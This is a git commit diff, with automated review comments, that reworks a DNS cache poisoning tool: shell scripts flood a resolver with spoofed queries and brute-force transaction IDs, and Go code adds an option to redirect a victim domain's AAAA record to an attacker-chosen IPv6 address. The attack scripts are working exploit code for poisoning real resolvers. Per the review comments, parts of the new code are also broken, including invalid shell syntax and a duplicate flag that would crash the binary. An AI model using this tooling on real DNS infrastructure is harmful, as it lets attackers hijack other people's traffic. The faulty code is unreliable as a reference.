author韩丁康 <[email protected]>2023-11-16 15:27:17 +0800
committer韩丁康 <[email protected]>2023-11-16 15:27:17 +0800
commit96d95325787050c7a8e71e59fa09f2bbefe485ee (patch)
tree8570b780e7394eb798ac19b65603772cd016e776
parente60c7d232865309eb4546c08b9a3a194733420fa (diff)
20231116-工具代码测试
-rw-r--r--attack.sh47
-rw-r--r--dns_query.sh11
-rw-r--r--src/ucr.edu/fakedns6/attack.go30
3 files changed, 57 insertions, 31 deletions
diff --git a/attack.sh b/attack.sh
index 85acfd4..5a1955c 100644
--- a/attack.sh
+++ b/attack.sh
@@ -3,32 +3,31 @@
# Please run with sudo.
# Verify the existing record domain, just for proof purposes.
-echo 'Before attack:'
+echo '原记录:'
dig @$1 $4 AAAA
-echo '10s to start attack...'
-sleep 10
-# flood
-# This is specifically for BIND. To prevent it from answering queries sent by 1.2.3.4, we spoof 1.2.3.250 to flood queries. BIND will then block all queries from the same /24 network.
-#sh ./dns_query.sh $5 `echo $1 | sed -E 's/\.[0-9]*$/\.250/g'` 789 `echo $4 | sed "s/\./ /g"`
-bash ./dns_query.sh $5 `echo $1` 789 `echo $4 | sed "s/\./ /g"`
-# Start attack
-# Change the argument accordingly
-time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -ad $2 -tg 0 -s 10000 -e 65000 -j 0
-
-# Attack finished
-# Kill the flooding process.
-# pkill hping
-# Validations
-echo 'After attack:'
-dig @$1 $4 AAAA
-echo 'If there is no change in result, please wait for the original cache to expire. Otherwise please terminate the attack by Ctrl-C.'
-sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'`
-echo "Wait for $sleeptime seconds..."
-sleep $sleeptime
-echo 'Cache should be poisoned now:'
-dig @$1 $4 AAAA
-echo 'Wait for another 2 seconds...'
+success=0
+while $success!=1
+do
+ success=0
+ echo '10秒之后开始攻击...'
+ sleep 10
+ echo "开始攻击"
+ # flood
+ success=$(bash ./dns_query.sh $5 `echo $1` 789 `echo $4 | sed "s/\./ /g"`)
+ # Start attack
+ # Change the argument accordingly
+ time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
+ # Validations
+ echo '攻击之后'
+ dig @$1 $4 AAAA
+ echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
+ echo "等待缓存过期"
+done
+# success
+echo '检测到攻击成功实现'
+echo '等待两秒,再次请求...'
sleep 2
dig @$1 $4 AAAA
+echo '攻击已完成!!!!'
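Review bot: The header says to run this with sudo, yet every positional parameter in the new lines is expanded unquoted (`dig @$1 $4 AAAA`, the `./fakedns6 …` line), so an argument containing whitespace or glob characters is split or expanded by a root shell. I would quote them, e.g. `dig @"$1" "$4" AAAA`, and fail early on a short argument list with `[ "$#" -ge 5 ] || exit 2`. Separately, `while $success!=1` is not a test expression: the shell tries to run a command named `0!=1`, so the closing messages are printed without any check having taken place and should not be read as a verified result.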
diff --git a/dns_query.sh b/dns_query.sh
index db7973e..05aa1b4 100644
--- a/dns_query.sh
+++ b/dns_query.sh
@@ -9,7 +9,6 @@ do
echo -en "\x`printf '%x\n' $size`" >> dns_mid.bin
echo -n "$var" >> dns_mid.bin
done
-echo '10s to start attack...'
# set a random TxID
echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
@@ -18,5 +17,13 @@ cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
# change the sending speed if necessary (-i). Set it to "flood" (replace -i with --flood) to maximize the power.
# fire!
echo "fire"
-#sudo hping3 $1 -2 -p 53 -E dns.bin -d `du -b dns.bin | awk '{print $1}'` -i u50000 -a $2
udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2
+a=$RANDOM %10
+echo 8
+if a>8
+do
+ ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1 >/dev/null 2>&1
+ echo 1
+done
+
+
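Review bot: The added block is not valid shell, so the script stops with a syntax error at `do`: `if` needs `then … fi`, and `a>8` is a redirection to a file named `8`, not a comparison. `a=$RANDOM %10` likewise runs a command called `%10` with `a` set in its environment instead of doing arithmetic. The shell forms would be `a=$((RANDOM % 10))` and `if [ "$a" -gt 8 ]; then … fi`. The bare `echo 8` / `echo 1` lines carry no comment, and `>/dev/null 2>&1` hides any failure of the command it wraps; a one-line comment stating what the caller expects on stdout would help.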
diff --git a/src/ucr.edu/fakedns6/attack.go b/src/ucr.edu/fakedns6/attack.go
index 49d1c49..d72cc9a 100644
--- a/src/ucr.edu/fakedns6/attack.go
+++ b/src/ucr.edu/fakedns6/attack.go
@@ -7,11 +7,13 @@ import (
"github.com/google/gopacket/layers"
"github.com/google/gopacket/pcap"
"github.com/google/gopacket/routing"
+ "github.com/miekg/dns"
"log"
"math/rand"
"net"
"os"
"strconv"
+ "strings"
"sync"
"time"
)
@@ -449,22 +451,41 @@ func main() {
defaultJitter := flag.Uint("j", 5, "Time gap between verification packet and the latest probe packet in a group. Increase the value if Jitter is increased.")
repeatTimes := flag.Uint("R", 1, "Retransmit/Reprobe a group of ports for X times to reduce FNs.")
timeGap := flag.Uint("tg", 0, "Time gap is us(microseconds) between the TxID brute force packets.")
- auxiliaryDomain := flag.String("ad", "", "Attacker-controlled domain used to host the fake NS for the victim domain and to store the fake AAAA record of the victim domain.")
+ //auxiliaryDomain := flag.String("ad", "", "Attacker-controlled domain used to host the fake NS for the victim domain and to store the fake AAAA record of the victim domain.")
+ attackertarget := flag.String("at", "", "攻击者想要更改到的IPv6地址")
debugOutput := flag.Bool("d", false, "Debug output mode.")
attackerMaliciousDomain := flag.String("f", "", "Attacker controlled domain used in the forwarder attack, this will enable the forwarder attack mode.")
soaName := flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)")
+ //特殊用途
+ isfake := flag.String("f", "0", "")
flag.Parse()
//gatewayMac, _ := net.ParseMAC(*gateWayMacStr)
Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTmeout, *defaultJitter,
- *attackerMaliciousDomain, *resolverBackendList, *debugOutput, *repeatTimes, *timeGap, *auxiliaryDomain, *soaName)
+ *attackerMaliciousDomain, *resolverBackendList, *debugOutput, *repeatTimes, *timeGap, *attackertarget, *soaName, *isfake)
os.Exit(0)
}
func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBackendIPArg net.IP, startPort uint, endPort uint, victimDNSNameArg string, dnsQueryTimeout uint,
- defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg uint, timeGapArg uint, auxiliaryDomainArg string,
- soaNameArg string) {
+ defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg uint, timeGapArg uint, attackertargetIP string,
+ soaNameArg string, isfake string) {
fmt.Println("/***Please make sure to fill every argument carefully and correct. Otherwise the program will crash.***/")
+
+ // 特殊用途
+ if isfake == "1" {
+ c := new(dns.Client)
+ msg := new(dns.Msg)
+ if strings.Contains(attackertargetIP, ":") {
+ ipcode := strings.ReplaceAll(attackertargetIP, ":", "-")
+ domain := ipcode + "." + victimDNSNameArg
+ msg.SetQuestion(domain, dns.TypeAAAA)
+ _, _, _ = c.Exchange(msg, resolverBackendIPArg.String())
+ return
+ } else {
+ println("参数有误,请输入IPv6地址作为篡改目标结果")
+ }
+
+ }
rand.Seed(time.Now().UnixNano())
handle, _ = pcap.OpenLive(
ifaceName,
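Review bot: `flag.String("f", "0", "")` registers `-f` a second time in `main`, where the forwarder-domain flag a few lines above already owns that name; the standard `flag` package panics on a redefined flag, so the binary would abort before `flag.Parse()`. The new option needs its own name and a non-empty usage string. In `Main`, the `else` branch prints the bad-argument message and then falls through into the normal run instead of stopping. `strings.Contains(attackertargetIP, ":")` is also a loose test, so I would validate with `ip := net.ParseIP(attackertargetIP)` and return when `ip == nil || ip.To4() != nil`. The result of `c.Exchange` is discarded with `_, _, _`, and `resolverBackendIPArg` is not checked for nil before `.String()`; `Main` continues past the end of this hunk.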
@@ -493,7 +514,6 @@ func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBack
victimDNSName = victimDNSNameArg
debugOutput = debugOutputArg
timeGap = timeGapArg
- auxiliaryDomain = auxiliaryDomainArg
soaName = soaNameArg
localIP, _ = GetIfaceAddrMulti(iface)